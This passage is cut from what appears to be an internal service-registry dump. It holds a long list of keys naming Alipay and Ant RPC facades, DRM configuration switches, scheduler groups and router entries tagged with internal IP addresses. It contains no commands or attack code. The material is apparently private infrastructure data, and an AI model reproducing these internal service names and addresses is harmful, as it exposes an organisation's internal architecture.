LT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.wealthahead.facade.WealthAheadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_partnerProjectService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.live.api.LiveContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instanalysis.common.service.facade.analyse.ReportEventHandlerFacade:1.0:instanalysis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mpaasafts@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imobile.foundation.framework.support.service.FoundationExtPointAdapterService:1.0:GLOBAL_SITE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.ProdQuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.lisa.LisaProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductKpiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.ldc.OfflineSceneRecognitionServiceInCZone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.shop.ShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.biz.service.meta.command.ManualCommandController#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityexprod.common.service.facade.eworkcard.EntCompInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.InnerAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@graymng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.dmeta.facade.metric.MetricRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.connect.rpc.api.VcardRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.ops.OpsCacheMerchantFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:testFailedNotRetryAbilityCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbmmweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ropcn.common.service.facade.api.riskmng.RiskmngAdapterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfodecision.common.service.facade.element.ElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iglobalriskmatrixsg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.SortQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.insassetprod.common.service.facade.InsUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.imerchprod.merchant.facade.api.MerchantManageService:1.0:imif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmportal.service.loan.api.RepayRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.itemrule.DeviceItemRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.warehouse.RestWarehouseService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insautomarket.common.facade.config.AutoMktConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almfas.common.service.facade.api.DivertStrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.naegis.service.fee.FeeExemptNewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:griver-quality@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.204.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linksec.facade.inc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfuse.common.service.facade.EntityStoreQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.alive.api.ALiveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.note.NoteQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.emotion.rpc.api.EmotionPackagePBRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.tool.TemplateDataConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.biz.shared.autodqc.MbtCaseManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.dsb.api.DsbShootGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intl.idataops.hbase.HbaseClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:GuessRoundAudit_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.schema.SchemaDefQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.express.service.InstAuthInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.speech.banner.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundUserFundBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.service.facade.api.paychecker.BenefitContentCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.244.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.33.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifin:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.codprod.common.service.facade.merchant.facade.MerchantConfigUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.uniintegration.facade.UniIntegrationServiceFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.orderdatacenter.facade.service.OrderDataInfoQuerySpiFacade:1.0:peerpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.88.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchselfop.common.service.ooda.facade.darwin.ExpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.throwRejectedException,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.212.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.dataModelWeight:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cpcenter.common.service.api.FellowGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_apprApproveSuccessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.igdmc.biz.service.LocalDataBloodRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pccontractprod.common.service.facade.api.certify.HBCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.lisaIdentityManualKybKyc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:cicadaxbase-multiend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.dataaccess.StandardDataAccessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.IntimateBenefitCallbackService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:benefitprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:csprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:sdaxconnectplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SubCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","gfinsight@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bic.common.service.facade.MobileBiometricService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminIsvAuthManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserRelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicPackageReleaseRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afx.tr.server.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chair-script:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findatacanal.common.service.manage.opendata.OpenDataOrgConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.157.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.almcenter.service.facade.api.cashpool.AlmCashPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbsecurityprod.common.service.facade.namelist.NamelistDefQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.165.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:govbizcenterdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:render@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.inner.InnerRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mfinsnsprod:name=com.alipay.mfinsnsprod.ldc.MFinSnsProdLdcDrmConfig.openLDCSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.business.business.BusinessManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.paidan.common.service.facade.query.IssueQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.ApplicationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.biz.service.hotevent.index.HotEventIndexManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SEC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:lifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.IndexDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.antfinancial.antchain.cloud.endpoint.facade.CloudIdeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.34.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.common.manage.facade.api.solution.BaseActivityTypeEnumService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.hotCountThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.service.drm.FPASwitchConfigDrm.migrateUserIdFlags,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.common.manage.facade.DeliverStrategyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtqualitycore.service.RuleLoader:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.api.TwoPhasePaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.49.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cif:name=com.alipay.cif.client.drm.CustomerTagSwitcher.customerTagGroupNames,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:dqcoupontoolstwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minicenter.common.service.facade.spi.audit.MiniappAuditCallBackFacade:1.0:alipayiotMiniappAuditCallBackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_finishOrderOperateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.SequenceService:1.0:fluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.meta.CarrierPropertyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebguardian.common.facade.service.InvokeRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.agency.PartnerFileManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.sceneinvest.starwish.api.StarWishPlanFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.91.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alideviceinfo.biz.shared.moneybox.service.facade.MbSubCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instbill.common.service.facade.model.api.QueryBillConfigInfo:1.0:instbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.client.BasicParamClient#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_CONTROL_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataservice:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finmap.core.service.api.TemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcserviceop.creditservice.service.facade.CreditServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.config.component.spi.consumer.ConfigConsumerSPI:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zplayback.playback.service.CaseLibService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.spi.RobotCallBackSPI:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillConsumeRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.core.service.hbase.promo.PromoMctFeatureRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-psbp-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.intl.facade.antishake.ExecutorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.feecharge.common.service.facade.api.FeeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_222#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.smartsql.service.spark.proxy.server.common.service.facade.service.WarehouseStatusService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exratecenter.service.facade.api.ExClientAgrMappingMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.api.CashierMultiQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.card.AggCardMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.product.EntProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.186.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.StaffActionFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:identitymatrixus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeco.coc.ecomodel.api.merchant.MerchantAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.cfpcenter.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instinfo.service.facade.spi.InstinfoSystemRCallService:1.0:pcinstecoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.ConfigMigrationDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promodmp.service.facade.crowd.UTFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.miniapp.MiniAppServiceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.OriginTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.socialopen.BatchTaskTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbpayment.common.service.facade.api.PayOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.PartnerPropertyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.ops.OpsContentServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:finslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicadamodel.common.service.facade.api.DomainTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.aghanimplus.MidasLoadTestDRMControl.allowQueryDB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paygrowth.common.service.facade.UserPaymentFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.sd.facade.huabei.AgdssdTwoPhaseCreditAmtOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.CampConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.facade.task.CommonTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.project.common.facade.api.TenantComputeEngineApi:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custcpt.facade.AccountVariableQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainconfigcenter.facade.notify.api.NotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.coordinator.service.ConfigLoadService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.fundselling.InstWithdrawConfigClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerAnyCorsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbschedules.common.serivce.facade.space.SpaceScheduleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIFreeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundbudget.facade.api.FundBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echannelcenter.common.service.facade.mng.EchannelGroupManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.DeploymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.ScheduleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.ReportSystemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.task.MsgTaskTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pam.PamAttrQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.promo.InviteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-insapportion-three-layers#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:xztest_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.implement.ImplementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.common.manage.facade.CardModelDefinitionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.grayprod.change.drm.ChangePolicy.testUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.cache.facade.MerchantCacheQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.LogicTableQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaboot_webtest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:publichome_baseInfoApplayCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.front.FrontQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.TaskListQwtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.SelectCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.orginization.MrchProdRealStoreMngF